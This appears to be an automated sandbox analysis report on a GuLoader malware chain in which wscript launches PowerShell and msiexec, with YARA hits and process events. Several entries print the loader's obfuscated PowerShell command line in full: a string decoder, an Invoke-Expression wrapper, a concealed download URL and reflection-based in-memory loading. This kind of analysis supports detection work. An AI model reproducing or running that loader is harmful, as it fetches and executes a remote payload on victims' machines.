              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Gearstngers Checkoffs Unappealingly", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 00000004.00000002.2508605979.0000000009345000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((diskettebger $Trykkefrihedens $Singularissen), (Flamlnders @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:converges = [AppDomain]::CurrentDomain.GetAssemb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Soddened13)), $Cirkelbevisets).DefineDynamicModule($cueing, $false).DefineType($Cellepora, $Riitta, [System.MulticastDelegate])$Indfds
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Waukit)$gloBal:BOgsamleRe42 = [systEM.Text.ENcoDIng]::ascII.GEtstRiNg($smELTEosTE)$glObal:dIssimILErEndE=$BogsAmlERe42.sUbsTrIng($FluKiLY135,$DekoDeRe)<#Waddles Prolongering Learnabl
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyGJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345079C5 push ebp; ret 2_2_00007FFD345079C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22331219 push esp; iretd 7_2_2233121A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322806 push ecx; ret 7_2_22322819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
